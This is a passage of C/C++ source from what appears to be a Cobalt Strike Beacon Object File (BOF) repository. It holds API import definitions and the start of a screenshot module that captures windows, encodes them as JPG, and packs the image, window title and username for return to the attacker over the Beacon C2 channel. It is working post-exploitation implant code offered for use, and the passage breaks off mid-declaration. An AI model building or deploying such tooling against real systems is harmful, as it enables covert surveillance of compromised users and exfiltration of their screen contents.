KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); 208 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle); 209 | DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 210 | DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen); 211 | 212 | 213 | /* Memory */ 214 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 215 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); 216 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 217 | DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); 218 | DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t); 219 | DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); 220 | 221 | 222 | /* Process */ 223 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); 224 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); 225 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(); 226 | DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); 227 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); 228 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead); 229 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); 230 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); 231 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 232 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); 233 | 234 | 235 | /* GetLast Error */ 236 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); 237 | 238 | 239 | /* Directories */ 240 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR); 241 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 242 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName); 243 | DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR); 244 | DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath); 245 | 246 | 247 | /* strings */ 248 | DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch); 249 | DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int); 250 | DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR); 251 | DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR); 252 | DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t); 253 | DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...); 254 | DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...); 255 | DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list); 256 | DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR); 257 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); 258 | DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str); 259 | DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2); 260 | DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2); 261 | DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength); 262 | DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString); 263 | DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); 264 | 265 | 266 | /* RPC */ 267 | DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String); 268 | DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid); 269 | DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid); 270 | 271 | 272 | /* Random */ 273 | DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial); 274 | DECLSPEC_IMPORT int WINAPI MSVCRT$rand(); 275 | 276 | 277 | /* DateTime */ 278 | DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time); 279 | 280 | 281 | /* SystemInfo */ 282 | DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); 283 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); 284 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer); 285 | 286 | 287 | 288 | 289 | 290 | 291 | #ifdef __cplusplus 292 | } 293 | #endif 294 | 295 | 296 | /* helper macros */ 297 | 298 | #define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */ 299 | 300 | /* 8/2/2025: THIS BROKE FOR SOME REASON */ 301 | //#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */ 302 | /* reassigned this to the MSVCRT free */ 303 | extern "C" DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* _Memory); 304 | #define free(addr) MSVCRT$free((void*)addr) 305 | 306 | #define ZeroMemory(address, size) memset(address, 0, size); 307 | 308 | /* GDI+ for JPG stuffs */ 309 | extern "C" DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName); 310 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM * ppstm); 311 | 312 | #define LoadLibraryA KERNEL32$LoadLibraryA 313 | #define CreateStreamOnHGlobal OLE32$CreateStreamOnHGlobal 314 | 315 | 316 | /* 7/2/2025 update - Hotfix for CS 4.9 support */ 317 | extern "C" DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpModuleName); 318 | extern "C" DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName); 319 | DECLSPEC_IMPORT LONG_PTR WINAPI USER32$GetWindowLongPtrA(HWND hWnd, int nIndex); 320 | DECLSPEC_IMPORT LONG_PTR WINAPI USER32$SetWindowLongPtrA(HWND hWnd, int nIndex, LONG_PTR dwNewLong); 321 | 322 | /* ----------------------------------- DEFINITIONS ------------------------------------------*/ 323 | 324 | /* 7/2/2025 update */ 325 | #define GetModuleHandleA KERNEL32$GetModuleHandleA 326 | #define GetProcAddress KERNEL32$GetProcAddress 327 | #define GetWindowLongPtrA USER32$GetWindowLongPtrA 328 | #define SetWindowLongPtrA USER32$SetWindowLongPtrA 329 | 330 | 331 | /* window functions */ 332 | #define ShowWindow User32$ShowWindow 333 | #define PrintWindow User32$PrintWindow 334 | #define SetLayeredWindowAttributes User32$SetLayeredWindowAttributes 335 | #define SetWindowPos User32$SetWindowPos 336 | #define GetWindowPlacement User32$GetWindowPlacement 337 | #define IsWindowVisible User32$IsWindowVisible 338 | #define UpdateWindow User32$UpdateWindow 339 | #define GetWindowRect User32$GetWindowRect 340 | #define GetWindowLongA User32$GetWindowLongA 341 | #define SetWindowLongA User32$SetWindowLongA 342 | #define EnumWindows User32$EnumWindows 343 | #define GetWindowThreadProcessId User32$GetWindowThreadProcessId 344 | 345 | /* COM */ 346 | #define CLSIDFromString OLE32$CLSIDFromString 347 | #define CoCreateInstance OLE32$CoCreateInstance 348 | #define CoInitializeEx OLE32$CoInitializeEx 349 | #define CoUninitialize OLE32$CoUninitialize 350 | #define IIDFromString OLE32$IIDFromString 351 | #define CoInitialize OLE32$CoInitialize 352 | #define CoCreateInstanceEx OLE32$CoCreateInstanceEx 353 | #define SysAllocString OleAut32$SysAllocString 354 | #define VariantInit OLEAUT32$VariantInit 355 | #define CoInitialize OLE32$CoInitialize 356 | #define CoInitializeSecurity OLE32$CoInitializeSecurity 357 | 358 | /* memory */ 359 | #define HeapFree KERNEL32$HeapFree 360 | #define HeapAlloc KERNEL32$HeapAlloc 361 | #define HeapReAlloc KERNEL32$HeapReAlloc 362 | #define memcpy MSVCRT$memcpy 363 | #define malloc MSVCRT$malloc 364 | #define memset MSVCRT$memset 365 | 366 | 367 | /* process */ 368 | #define GetProcessHeap KERNEL32$GetProcessHeap 369 | #define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW 370 | #define OpenProcess KERNEL32$OpenProcess 371 | #define VirtualQueryEx KERNEL32$VirtualQueryEx 372 | #define GetProcessId KERNEL32$GetProcessId 373 | #define ReadProcessMemory KERNEL32$ReadProcessMemory 374 | #define GetCurrentProcess KERNEL32$GetCurrentProcess 375 | #define Sleep KERNEL32$Sleep 376 | #define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW 377 | #define GetModuleFileNameExW PSAPI$GetModuleFileNameExW 378 | 379 | 380 | /* debug */ 381 | #define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64 382 | #define SymInitializeW DBGHELP$SymInitializeW 383 | #define SymCleanup DBGHELP$SymCleanup 384 | 385 | 386 | /* filesystem */ 387 | #define CreateFileA KERNEL32$CreateFileA 388 | #define SetFilePointer KERNEL32$SetFilePointer 389 | #define SetFilePointerEx KERNEL32$SetFilePointerEx 390 | #define WriteFile KERNEL32$WriteFile 391 | #define GetFileSizeEx KERNEL32$GetFileSizeEx 392 | #define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW 393 | #define GetFileVersionInfoW VERSION$GetFileVersionInfoW 394 | #define VerQueryValueW VERSION$VerQueryValueW 395 | 396 | /* error */ 397 | #define GetLastError KERNEL32$GetLastError 398 | 399 | 400 | /* registry */ 401 | #define RegOpenKeyExA ADVAPI32$RegOpenKeyExA 402 | #define RegDeleteTreeA ADVAPI32$RegDeleteTreeA 403 | #define RegCreateKeyExA ADVAPI32$RegCreateKeyExA 404 | #define RegSetValueExA ADVAPI32$RegSetValueExA 405 | 406 | 407 | /* directory */ 408 | #define RemoveDirectoryA KERNEL32$RemoveDirectoryA 409 | #define CreateDirectoryA KERNEL32$CreateDirectoryA 410 | #define MoveFileA KERNEL32$MoveFileA 411 | #define PathIsDirectoryA SHLWAPI$PathIsDirectoryA 412 | #define PathFileExistsA SHLWAPI$PathFileExistsA 413 | 414 | 415 | /* strings */ 416 | #define strchr MSVCRT$strchr 417 | #define strcat_s MSVCRT$strcat_s 418 | #define strcpy_s MSVCRT$strcpy_s 419 | #define strncpy_s MSVCRT$strncpy_s 420 | #define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */ 421 | #define wcslen MSVCRT$wcslen 422 | #define vsnprintf MSVCRT$vsnprintf 423 | #define lstrlenW KERNEL32$lstrlenW 424 | #define lstrcpyW KERNEL32$lstrcpyW 425 | #define strcmp MSVCRT$strcmp 426 | #define lstrcpyA Kernel32$lstrcpyA 427 | #define lstrcatA Kernel32$lstrcatA 428 | #define lstrcpynA Kernel32$lstrcpynA 429 | #define lstrlenW KERNEL32$lstrlenW 430 | #define lstrcpyW KERNEL32$lstrcpyW 431 | #define sprintf MSVCRT$sprintf 432 | #define strlen MSVCRT$strlen 433 | 434 | 435 | /* RPC */ 436 | #define RpcStringFreeA Rpcrt4$RpcStringFreeA 437 | #define UuidCreate Rpcrt4$UuidCreate 438 | #define UuidToStringA Rpcrt4$UuidToStringA 439 | 440 | 441 | /* Random */ 442 | #define srand MSVCRT$srand 443 | #define rand MSVCRT$rand 444 | 445 | 446 | /* DateTime */ 447 | #define time MSVCRT$time 448 | 449 | 450 | /* SystemInfo */ 451 | #define GetSystemInfo KERNEL32$GetSystemInfo 452 | #define GetUserNameW ADVAPI32$GetUserNameW 453 | #define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent 454 | 455 | #else 456 | 457 | #endif 458 | -------------------------------------------------------------------------------- /entry.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "bofdefs.h" 6 | #include 7 | 8 | #pragma comment(lib, "User32.lib") 9 | 10 | /* 11 | 12 | 9/2/2025 update 13 | 14 | 15 | this line was the source of my hatred for MSVC and CobaltStrike for 2 days 16 | https://x.com/codex_tf2/status/1888504670269874667 17 | 18 | for whatever reason, adding the 19 | ``` 20 | using namespace Gdiplus; 21 | ``` 22 | line caused MSVC to use COMDAT sections which Beacon for whatever reason doesnt handle well. 23 | But guess what? By sheer luck (and arguably slightly better handling), the TrustedSec COFFLoader 24 | was able to run the BOF just fine. 25 | 26 | So i had a fully working BOF that only worked in COFFLoader but not in Beacon for a whole day and a half. 27 | thx (and condolences) to all the unfortunate souls who looked at this error with me 28 | 29 | This single line is the cause of the migration from MSVC to mingw. 30 | 31 | CodeX 32 | */ 33 | using namespace Gdiplus; 34 | 35 | 36 | /*Download Screenshot*/ 37 | void downloadScreenshot(char* jpg, int jpgLen, int session, char* windowTitle, int titleLen, char* username, int usernameLen) { 38 | // Function modified by @BinaryFaultline 39 | 40 | // This data helped me figure out the C code to download a screenshot. It was found in the BOF.NET code here: https://github.com/CCob/BOF.NET/blob/2da573a4a2a760b00e66cd051043aebb2cfd3182/managed/BOFNET/BeaconObject.cs 41 | // Special thanks to CCob doing the research around the BeaconOutput options, making this much easier for me. 42 | 43 | // private void WriteSessionUserNameTitle(BinaryWriter bw, int session, string userName, string title) { 44 | // bw.Write(session); 45 | // bw.Write(title.Length); 46 | // bw.Write(Encoding.UTF8.GetBytes(title)); 47 | // bw.Write(userName.Length); 48 | // bw.Write(Encoding.UTF8.GetBytes(userName)); 49 | // } 50 | 51 | // var screenshotCallback = new BinaryWriter(new MemoryStream()); 52 | // screenshotCallback.Write(jpgData.Length); 53 | // screenshotCallback.Write(jpgData); 54 | // WriteSessionUserNameTitle(screenshotCallback, session, userName, title); 55 | int messageLength = 4 + jpgLen + 4 + 4 + titleLen + 4 + usernameLen; 56 | char* packedData = (char*)MSVCRT$malloc(messageLength); 57 | 58 | // //pack on jpgLen/fileSize as 4-byte int second 59 | packedData[0] = jpgLen & 0xFF; 60 | packedData[1] = (jpgLen >> 8) & 0xFF; 61 | packedData[2] = (jpgLen >> 16) & 0xFF; 62 | packedData[3] = (jpgLen >> 24) & 0xFF; 63 | 64 | int packedIndex = 4; 65 | 66 | // //pack on the bytes of jpg/returnData 67 | for (int i = 0; i < jpgLen; i++) { 68 | packedData[packedIndex] = jpg[i]; 69 | packedIndex++; 70 | } 71 | 72 | //pack on session as 4-byte int first 73 | packedData[packedIndex] = session & 0xFF; 74 | packedData[packedIndex + 1] = (session >> 8) & 0xFF; 75 | packedData[packedIndex + 2] = (session >> 16) & 0xFF; 76 | packedData[packedIndex + 3] = (session >> 24) & 0xFF; 77 | 78 | //pack on titleLength as 4-byte int second 79 | packedData[packedIndex + 4] = titleLen & 0xFF; 80 | packedData[packedIndex + 5] = (titleLen >> 8) & 0xFF; 81 | packedData[packedIndex + 6] = (titleLen >> 16) & 0xFF; 82 | packedData[packedIndex + 7] = (titleLen >> 24) & 0xFF; 83 | 84 | packedIndex += 8; 85 | 86 | //pack on the bytes of title 87 | for (int i = 0; i < titleLen; i++) { 88 | packedData[packedIndex] = windowTitle[i]; 89 | packedIndex++; 90 | } 91 | 92 | //pack on userLength as 4-byte int second 93 | packedData[packedIndex] = usernameLen & 0xFF; 94 | packedData[packedIndex + 1] = (usernameLen >> 8) & 0xFF; 95 | packedData[packedIndex + 2] = (usernameLen >> 16) & 0xFF; 96 | packedData[packedIndex + 3] = (usernameLen >> 24) & 0xFF; 97 | 98 | packedIndex += 4; 99 | 100 | //pack on the bytes of user 101 | for (int i = 0; i < usernameLen; i++) { 102 | packedData[packedIndex] = username[i]; 103 | packedIndex++; 104 | } 105 | 106 | BeaconOutput(CALLBACK_SCREENSHOT, packedData, messageLength); 107 | return; 108 | } 109 | //------------------------------------------------------------- 110 | // Typedefs for the WinAPI functions 111 | //------------------------------------------------------------- 112 | typedef char* (__cdecl *PFN_getenv)(const char*); 113 | static PFN_getenv pgetenv = NULL; 114 | typedef HDC(WINAPI* PFN_CreateDCA)(LPCSTR, LPCSTR, LPCSTR, const DEVMODEA*); 115 | typedef int (WINAPI* PFN_GetDeviceCaps)(HDC, int); 116 | typedef BOOL(WINAPI* PFN_DeleteDC)(HDC); 117 | typedef int (WINAPI* PFN_GetObjectA)(HANDLE, int, LPVOID); 118 | typedef HGDIOBJ(WINAPI* PFN_GetStockObject)(int); 119 | typedef HDC(WINAPI* PFN_GetDC)(HWND); 120 | typedef int (WINAPI* PFN_ReleaseDC)(HWND, HDC); 121 | typedef HDC(WINAPI* PFN_CreateCompatibleDC)(HDC); 122 | typedef HBITMAP(WINAPI* PFN_CreateCompatibleBitmap)(HDC, int, int); 123 | typedef HGDIOBJ(WINAPI* PFN_SelectObject)(HDC, HGDIOBJ); 124 | typedef BOOL(WINAPI* PFN_PrintWindow)(HWND, HDC, UINT); 125 | typedef BOOL(WINAPI* PFN_BitBlt)(HDC, int, int, int, int, HDC, int, int, DWORD); 126 | typedef BOOL(WINAPI* PFN_StretchBlt)(HDC, int, int, int, int, HDC, int, int, int, int, DWORD); 127 | typedef BOOL(WINAPI* PFN_ShowWindow)(HWND, int); 128 | typedef LONG(WINAPI* PFN_SetWindowLongA)(HWND, int, LONG); 129 | typedef int (WINAPI* PFN_SetStretchBltMode)(HDC, int); 130 | typedef BOOL(WINAPI* PFN_SetLayeredWindowAttributes)(HWND, COLORREF, BYTE, DWORD); 131 | typedef BOOL(WINAPI* PFN_UpdateWindow)(HWND); 132 | typedef VOID(WINAPI* PFN_Sleep)(DWORD); 133 | typedef BOOL(WINAPI* PFN_GetWindowRect)(HWND, LPRECT); 134 | typedef HANDLE(WINAPI* PFN_CreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE); 135 | typedef BOOL(WINAPI* PFN_WriteFile) (HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); 136 | typedef BOOL(WINAPI* PFN_CloseHandle)(HANDLE); 137 | typedef HGLOBAL(WINAPI* PFN_GlobalAlloc)(UINT, SIZE_T); 138 | typedef LPVOID(WINAPI* PFN_GlobalLock)(HGLOBAL); 139 | typedef BOOL(WINAPI* PFN_GlobalUnlock)(HGLOBAL); 140 | typedef HGLOBAL(WINAPI* PFN_GlobalFree)(HGLOBAL); 141 | typedef BOOL(WINAPI* PFN_GetWindowPlacement)(HWND, WINDOWPLACEMENT*); 142 | typedef DWORD(WINAPI* PFN_GetWindowThreadProcessId)(HWND, LPDWORD); 143 | typedef BOOL(WINAPI* PFN_EnumWindows)(WNDENUMPROC, LPARAM); 144 | typedef int (WINAPI* PFN_GetSystemMetrics)(int); 145 | typedef BOOL(WINAPI* PFN_SetWindowPos)(HWND, HWND, int, int, int, int, UINT); 146 | typedef BOOL(WINAPI* PFN_DeleteObject)(HGDIOBJ); 147 | typedef HGDIOBJ(WINAPI* PFN_SelectPalette)(HDC, HPALETTE, BOOL); 148 | typedef UINT(WINAPI* PFN_RealizePalette)(HDC); 149 | typedef int (WINAPI* PFN_GetDIBits)(HDC, HBITMAP, UINT, UINT, LPVOID, LPBITMAPINFO, UINT); 150 | typedef BOOL(WINAPI* PFN_IsWindowVisible)(HWND); 151 | typedef DWORD (WINAPI* PFN_GetCurrentProcessId)(void); 152 | typedef BOOL (WINAPI* PFN_ProcessIdToSessionId)(DWORD dwProcessId, DWORD* pSessionId); 153 | typedef BOOL (WINAPI *PFN_GetHandleInformation)(HANDLE, LPDWORD); 154 | //------------------------------------------------------------- 155 | // init my func ptrs 156 | //------------------------------------------------------------- 157 | static PFN_CreateDCA pCreateDC = NULL; 158 | static PFN_GetDeviceCaps pGetDeviceCaps = NULL; 159 | static PFN_DeleteDC pDeleteDC = NULL; 160 | static PFN_GetObjectA pGetObjectA = NULL; 161 | static PFN_GetStockObject pGetStockObject = NULL; 162 | static PFN_GetDC pGetDC = NULL; 163 | static PFN_ReleaseDC pReleaseDC = NULL; 164 | static PFN_CreateCompatibleDC pCreateCompatibleDC = NULL; 165 | static PFN_CreateCompatibleBitmap pCreateCompatibleBitmap = NULL; 166 | static PFN_SelectObject pSelectObject = NULL; 167 | static PFN_PrintWindow pPrintWindow = NULL; 168 | static PFN_BitBlt pBitBlt = NULL; 169 | static PFN_StretchBlt pStretchBlt = NULL; 170 | static PFN_ShowWindow pShowWindow = NULL; 171 | static PFN_SetWindowLongA pSetWindowLongA = NULL; 172 | static PFN_SetStretchBltMode pSetStretchBltMode = NULL; 173 | static PFN_SetLayeredWindowAttributes pSetLayeredWindowAttributes = NULL; 174 | static PFN_UpdateWindow pUpdateWindow = NULL; 175 | static PFN_Sleep pSleep = NULL; 176 | static PFN_GetWindowRect pGetWindowRect = NULL; 177 | static PFN_CreateFileA pCreateFileA = NULL; 178 | static PFN_WriteFile pWriteFile = NULL; 179 | static PFN_CloseHandle pCloseHandle = NULL; 180 | static PFN_GlobalAlloc pGlobalAlloc = NULL; 181 | static PFN_GlobalLock pGlobalLock = NULL; 182 | static PFN_GlobalUnlock pGlobalUnlock = NULL; 183 | static PFN_GlobalFree pGlobalFree = NULL; 184 | static PFN_GetWindowPlacement pGetWindowPlacement = NULL; 185 | static PFN_GetWindowThreadProcessId pGetWindowThreadProcessId = NULL; 186 | static PFN_EnumWindows pEnumWindows = NULL; 187 | static PFN_GetSystemMetrics pGetSystemMetrics = NULL; 188 | static PFN_SetWindowPos pSetWindowPos = NULL; 189 | static PFN_DeleteObject pDeleteObject = NULL; 190 | static PFN_SelectPalette pSelectPalette = NULL; 191 | static PFN_RealizePalette pRealizePalette = NULL; 192 | static PFN_GetDIBits pGetDIBits = NULL; 193 | static PFN_IsWindowVisible pIsWindowVisible = NULL; 194 | static PFN_GetCurrentProcessId pGetCurrentProcessId = NULL; 195 | static PFN_ProcessIdToSessionId pProcessIdToSessionId = NULL; 196 | static PFN_GetHandleInformation pGetHandleInformation = NULL; 197 | //------------------------------------------------------------- 198 | // Dynamically resolve the required WinAPI functions because winapi limit :( 199 | //------------------------------------------------------------- 200 | void ResolveAPIs(void) 201 | { 202 | HMODULE hKernel32 = GetModuleHandleA("kernel32.dll"); 203 | HMODULE hUser32 = GetModuleHandleA("user32.dll"); 204 | HMODULE hGdi32 = GetModuleHandleA("gdi32.dll"); 205 | HMODULE hMSVCRT = GetModuleHandleA("msvcrt.dll"); 206 | pgetenv = (PFN_getenv)GetProcAddress(hMSVCRT, "getenv"); 207 | pCreateDC = (PFN_CreateDCA)GetProcAddress(hGdi32, "CreateDCA"); 208 | pGetDeviceCaps = (PFN_GetDeviceCaps)GetProcAddress(hGdi32, "GetDeviceCaps"); 209 | pDeleteDC = (PFN_DeleteDC)GetProcAddress(hGdi32, "DeleteDC"); 210 | pGetObjectA = (PFN_GetObjectA)GetProcAddress(hGdi32, "GetObjectA"); 211 | pGetStockObject = (PFN_GetStockObject)GetProcAddress(hGdi32, "GetStockObject"); 212 | pGetDC = (PFN_GetDC)GetProcAddress(hUser32, "GetDC"); 213 | pReleaseDC = (PFN_ReleaseDC)GetProcAddress(hUser32, "ReleaseDC"); 214 | pCreateCompatibleDC = (PFN_CreateCompatibleDC)GetProcAddress(hGdi32, "CreateCompatibleDC"); 215 | pCreateCompatibleBitmap = (PFN_CreateCompatibleBitmap)GetProcAddress(hGdi32, "CreateCompatibleBitmap"); 216 | pSelectObject = (PFN_SelectObject)GetProcAddress(hGdi32, "SelectObject"); 217 | pPrintWindow = (PFN_PrintWindow)GetProcAddress(hUser32, "PrintWindow"); 218 | pBitBlt = (PFN_BitBlt)GetProcAddress(hGdi32, "BitBlt"); 219 | pStretchBlt = (PFN_StretchBlt)GetProcAddress(hGdi32, "StretchBlt"); 220 | pShowWindow = (PFN_ShowWindow)GetProcAddress(hUser32, "ShowWindow"); 221 | pSetWindowLongA = (PFN_SetWindowLongA)GetProcAddress(hUser32, "SetWindowLongA"); 222 | pSetStretchBltMode = (PFN_SetStretchBltMode)GetProcAddress(hGdi32, "SetStretchBltMode"); 223 | pSetLayeredWindowAttributes = (PFN_SetLayeredWindowAttributes)GetProcAddress(hUser32, "SetLayeredWindowAttributes"); 224 | pUpdateWindow = (PFN_UpdateWindow)GetProcAddress(hUser32, "UpdateWindow"); 225 | pSleep = (PFN_Sleep)GetProcAddress(hKernel32, "Sleep"); 226 | pGetWindowRect = (PFN_GetWindowRect)GetProcAddress(hUser32, "GetWindowRect"); 227 | pCreateFileA = (PFN_CreateFileA)GetProcAddress(hKernel32, "CreateFileA"); 228 | pWriteFile = (PFN_WriteFile)GetProcAddress(hKernel32, "WriteFile"); 229 | pCloseHandle = (PFN_CloseHandle)GetProcAddress(hKernel32, "CloseHandle"); 230 | pGlobalAlloc = (PFN_GlobalAlloc)GetProcAddress(hKernel32, "GlobalAlloc"); 231 | pGlobalLock = (PFN_GlobalLock)GetProcAddress(hKernel32, "GlobalLock"); 232 | pGlobalUnlock = (PFN_GlobalUnlock)GetProcAddress(hKernel32, "GlobalUnlock"); 233 | pGlobalFree = (PFN_GlobalFree)GetProcAddress(hKernel32, "GlobalFree"); 234 | pGetWindowPlacement = (PFN_GetWindowPlacement)GetProcAddress(hUser32, "GetWindowPlacement"); 235 | pGetWindowThreadProcessId = (PFN_GetWindowThreadProcessId)GetProcAddress(hUser32, "GetWindowThreadProcessId"); 236 | pEnumWindows = (PFN_EnumWindows)GetProcAddress(hUser32, "EnumWindows"); 237 | pGetSystemMetrics = (PFN_GetSystemMetrics)GetProcAddress(hUser32, "GetSystemMetrics"); 238 | pSetWindowPos = (PFN_SetWindowPos)GetProcAddress(hUser32, "SetWindowPos"); 239 | pDeleteObject = (PFN_DeleteObject)GetProcAddress(hGdi32, "DeleteObject"); 240 | pSelectPalette = (PFN_SelectPalette)GetProcAddress(hGdi32, "SelectPalette"); 241 | pRealizePalette = (PFN_RealizePalette)GetProcAddress(hGdi32, "RealizePalette"); 242 | pGetDIBits = (PFN_GetDIBits)GetProcAddress(hGdi32, "GetDIBits"); 243 | pIsWindowVisible = (PFN_IsWindowVisible)GetProcAddress(hUser32, "IsWindowVisible"); 244 | pGetCurrentProcessId = (PFN_GetCurrentProcessId)GetProcAddress(hKernel32, "GetCurrentProcessId"); 245 | pProcessIdToSessionId = (PFN_ProcessIdToSessionId)GetProcAddress(hKernel32, "ProcessIdToSessionId"); 246 | pGetHandleInformation = (PFN_GetHandleInformation)GetProcAddress(hKernel32, "GetHandleInformation"); 247 | } 248 | 249 | //------------------------------------------------------------- 250 | // Dynamically resolve more GDI+ functions 251 | //------------------------------------------------------------- 252 | typedef Status(WINAPI* PFN_GdiplusStartup)(ULONG_PTR*, const GdiplusStartupInput*, GdiplusStartupOutput*); 253 | typedef VOID(WINAPI* PFN_GdiplusShutdown)(ULONG_PTR); 254 | typedef Status(WINAPI* PFN_GdipCreateBitmapFromHBITMAP)(HBITMAP, HPALETTE, GpBitmap**); 255 | typedef Status(WINAPI* PFN_GdipDisposeImage)(GpImage*); 256 | typedef Status(WINAPI* PFN_GdipSaveImageToStream)(GpImage*, IStream*, const CLSID*, const EncoderParameters*); 257 | typedef Status(WINAPI* PFN_GdipBitmapLockBits)(GpBitmap*, const GpRect*, UINT, PixelFormat, BitmapData*); 258 | typedef Status(WINAPI* PFN_GdipBitmapUnlockBits)(GpBitmap*, BitmapData*); 259 | typedef Status(WINAPI* PFN_GdipGetImageWidth)(GpImage*, UINT*); 260 | typedef Status(WINAPI* 